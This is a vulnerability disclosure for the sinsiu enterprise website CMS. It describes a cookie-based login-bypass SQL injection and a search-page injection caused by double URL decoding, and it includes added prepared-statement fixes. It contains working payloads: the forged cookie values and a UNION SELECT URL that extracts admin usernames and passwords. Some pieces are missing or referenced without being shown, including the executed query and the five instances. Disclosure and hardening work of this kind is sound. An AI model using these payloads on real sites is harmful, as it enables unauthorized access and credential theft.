Two SQL injection points for a general enterprise website construction system
The Rookie enterprise website system (PHP version) is a simple, easy-to-use PHP enterprise website system intended for secondary development. MySQL and Access databases can be chosen when the system is installed. The back end has complete functions, simple operation, good scalability and high security. The front end can display several languages at the same time, which suits foreign-trade enterprises building websites. The system uses the well-known PHP template engine Smarty, so developers familiar with Smarty can quickly create sinsiu templates.
SQL #1
/Include/function.php

    function strict($str) {
        if (S_MAGIC_QUOTES_GPC) {          // constant name reproduced as it appears in the write-up
            $str = stripslashes($str);      // if GPC is on, remove the escape characters (practically inviting injection ...)
        }
        $str = str_replace('<', '&#60;', $str);
        $str = str_replace('>', '&#62;', $str);
        $str = str_replace('?', '&#63;', $str);
        $str = str_replace('%', '&#37;', $str);
        $str = str_replace(chr(39), '&#39;', $str);
        $str = str_replace(chr(34), '&#34;', $str);
        $str = str_replace(chr(13).chr(10), '<br/>', $str);
        return $str;                        // filters some characters; single quotes are missing
    }
Parameters submitted from the front end are urlencoded before being written into the database (more on this later). Because of that, only one place can be injected through this function.

In the same file:

    function check_user_login() {
        global $user_id;
        $username = get_cookie('user_username');
        $password = get_cookie('user_password');
        if ($username != '' && $password != '') {
            $obj = new users();
            $obj->set_field('use_id');
            $obj->set_where("use_username = '$username'");   // cookie value spliced straight into the WHERE clause
            $obj->set_where("use_password = '$password'");
            $one = $obj->get_one();
            if (count($one) !== 0) {
                $user_id = $one['use_id'];
                return intval($user_id);
            } else {
                return 0;
            }
        } else {
            return 0;
        }
    }
We set the cookies to:
user_username = aa\ ;user_password=or use_id = 1 %23
Checking the SQL log, the executed statement is

Arbitrary user logins can be forged; no error is reported, so this is blind injection.
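The root cause of SQL #1 is that strict() never touches backslashes and the cookie values are spliced into the WHERE clause as text. The following is an added example, not sinsiu's own code: a hardened replacement for check_user_login() that keeps the same logic but binds both cookie values as parameters. It assumes a mysqli connection $db and a table named `users` holding the use_id, use_username and use_password columns seen above; the table name is an assumption.

```php
<?php
// Added example for this write-up, not sinsiu's own code.
// Hardened replacement for check_user_login(): the cookie values are bound as
// parameters instead of being interpolated into the WHERE clause, so neither a
// trailing backslash nor a comment marker can change the query's structure.
// Assumptions: a mysqli connection $db and a table `users` with the columns
// use_id, use_username and use_password from the write-up (table name assumed).

function check_user_login_safe(mysqli $db): int
{
    $username = $_COOKIE['user_username'] ?? '';
    $password = $_COOKIE['user_password'] ?? '';
    if ($username === '' || $password === '') {
        return 0;
    }

    // Same condition as the original, but with placeholders: the driver sends the
    // values separately from the SQL text, so no escaping function (and no
    // magic_quotes / stripslashes round trip) is involved at all.
    $stmt = $db->prepare(
        'SELECT use_id FROM users WHERE use_username = ? AND use_password = ? LIMIT 1'
    );
    if ($stmt === false) {
        return 0;
    }
    $stmt->bind_param('ss', $username, $password);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() requires mysqlnd
    $stmt->close();

    return $row ? (int) $row['use_id'] : 0;
}
```

With this shape, the entity-encoding filter in strict() can stay purely an HTML output concern; it no longer carries any responsibility for protecting SQL, which is where it failed (it rewrites quotes but leaves the backslash that escapes the closing quote untouched).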
SQL #2 (pseudo-static injection)
/Index/search.php

    set_smarty();
    load_lang_pack(array($global['channel']));
    initial('index');
    if (isset($global['key'])) {
        $smarty->assign('page_title', rawurldecode($global['key']));   // decodes the already-decoded key a second time
    }
    $smarty->display('search.php');

Here the URL-encoded data is decoded a second time, after filtering, so an encoded single quote survives the filter and becomes a literal quote.
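The defect in SQL #2 is one of ordering: the keyword is filtered first and decoded afterwards. The following is an added example, not sinsiu's own code: a hardened handler for the search keyword that does not decode the value again, escapes it for HTML only at output time, and binds it as a LIKE parameter. It assumes a mysqli connection $db, a Smarty instance $smarty, and a hypothetical table php_article with columns art_id and art_title; all three names are assumptions.

```php
<?php
// Added example for this write-up, not sinsiu's own code.
// Hardened handling of the search keyword from /Index/search.php: the value in
// $global['key'] is not decoded a second time, it is HTML-escaped only when it is
// assigned for output, and the lookup binds it as a LIKE parameter.
// Assumptions: a mysqli connection $db, a Smarty instance $smarty, and a
// hypothetical table php_article with columns art_id and art_title.

function search_articles(mysqli $db, Smarty $smarty, array $global): array
{
    // The router has already URL-decoded the path segment once; calling
    // rawurldecode() here again is what let an encoded quote reach the query.
    $key = isset($global['key']) ? (string) $global['key'] : '';
    $key = mb_substr(trim($key), 0, 64);   // bound the length that reaches the database

    // Escape at the output boundary. The original strict() filter mixed HTML entity
    // encoding with what was meant to be SQL protection; here the two are separate.
    $smarty->assign('page_title', htmlspecialchars($key, ENT_QUOTES, 'UTF-8'));

    if ($key === '') {
        $smarty->display('search.php');
        return [];
    }

    // '%' and '_' are LIKE wildcards; escape them so the user's text matches
    // literally, then bind the whole pattern. Quotes need no handling at all here.
    $pattern = '%' . addcslashes($key, '%_\\') . '%';
    $stmt = $db->prepare(
        'SELECT art_id, art_title FROM php_article WHERE art_title LIKE ? LIMIT 50'
    );
    if ($stmt === false) {
        $smarty->display('search.php');
        return [];
    }
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);   // requires mysqlnd
    $stmt->close();

    $smarty->assign('results', $rows);
    $smarty->display('search.php');
    return $rows;
}
```

The general rule this illustrates: decode exactly once, at the edge, and validate or bind the fully decoded value. Any filter applied before the last decoding step is looking at a different string than the one the database will see.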
Against the default database structure from the official website, the exp is:
?/search/index.html/key-%%27%20union%20select%20adm_username,adm_password,3%20from%20php_admin%23/
(Screenshot of the rendered search page; its visible text reads "Keywords" and "Powered by sinsiu, Guangdong ICP registration No. 12345678".)
The /search/ page can be injected (two versions exist, but the ASP version is not injectable).
We recommend using sqlmap for testing.
Five instances are provided to show that the issue is general to this system.
Solution:
Filter the input.